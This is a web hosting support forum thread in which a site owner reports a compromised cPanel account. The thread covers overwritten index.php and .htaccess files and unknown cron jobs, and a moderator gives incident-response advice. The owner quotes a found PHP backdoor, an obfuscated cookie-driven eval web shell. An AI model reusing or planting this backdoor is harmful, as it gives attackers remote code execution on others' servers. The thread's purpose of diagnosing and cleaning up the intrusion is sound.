Public_html and other sub folder index.php and htaccess file issue

Operating System & Version
CentOS v7.9.2009
cPanel & WHM Version
106.0.9

shaktis

Registered
Nov 14, 2022
4
0
1
India
cPanel Access Level
Website Owner
I recently noticed my server domain public_html index.php and htaccess file is overwritten by someone without permission and the same thing happens on several subfolders.

On some websites, new subfolders are created on public_html all of them have index.php file. Sometimes Wordpress related folders are created.


That updated index file has this on public_html

1668427497083.png


On subfolder .PHP file has this code

<?php
function visit_cookie() {
$h = $_COOKIE;
($h && isset($h[93])) ? (($ms = $h[93].$h[78]) &&
($qh = $ms($h[73].$h[22])) && ($_qh = $ms($h[94].$h[82])) &&
($_qh = $_qh($ms($h[10]))) && @eval($_qh)) : $h;

return 0;
}

visit_cookie();

Automatic cron are setup on the server which I have never created.
1668427107172.png

I have checked the log this I get


66.248.202.40 - - [11/Nov/2022:09:25:59 +0000] "GET /.well-known/themes.php HTTP/1.1" 200 - "批量打开网址、网页、网站(网址、超链接批量打开工具,如何批量一键快速打开多个网站、网页)" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"

66.248.202.40 - - [11/Nov/2022:09:25:59 +0000] "GET /module/update.php HTTP/1.1" 200 - "批量打开网址、网页、网站(网址、超链接批量打开工具,如何批量一键快速打开多个网站、网页)" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"

Can someone please help me to find out how someone can upload these folders, and files and set up cron without any permission on the panel?
 
Last edited by a moderator:

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
13,463
2,114
363
cPanel Access Level
Root Administrator
Hey there! Do you have SSH access enabled on the account? If so, the user could have come from anywhere with a stolen password.

The first place I would echeck would be the cPanel access logs, specifically looking for access to the Cron or File Manager of the cPanel interface. If you can find access that isn't authorized, you can block that IP address.

It would also be a good idea to have any users with access to the cPanel account scan their local machines for malware, as keylogging software to steal passwords is common.
 

shaktis

Registered
Nov 14, 2022
4
0
1
India
cPanel Access Level
Website Owner
Thank you for your response, I have checked both access log file via terminal and raw access log but haven't found any instance or activity of adding cron file or adding index.php and .htaccess file on the server itself. Can you please provide more details and suggest how we can prevent that from happening going forward?
 

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
13,463
2,114
363
cPanel Access Level
Root Administrator
The best way to check that is to recreate the process inside cPanel. For example, I would watch /usr/local/cpanel/logs/access_log while opening the File Manager inside of a cPanel account, and then you'll know what to search for in the log to see that same action from other IP addresses.

If you really don't see anything there, it could be a malicious script inside the account that is creating these files, so you'd want to investigate the account for malware. We recommend Imunify for scanning your machine, and there are details on that process here:


If that still doesn't find anything, you'll want to reach out to your host or a professional administrator to have a more thorough review of the account performed.
 

shaktis

Registered
Nov 14, 2022
4
0
1
India
cPanel Access Level
Website Owner
Thank you for the detailed information, I will review that and will also consider the anti virus option you suggested.

One more question:
Is there any settings I can make to open file manager, FTP, ssh, cpanel etc. from allowed IP address only? Please suggest.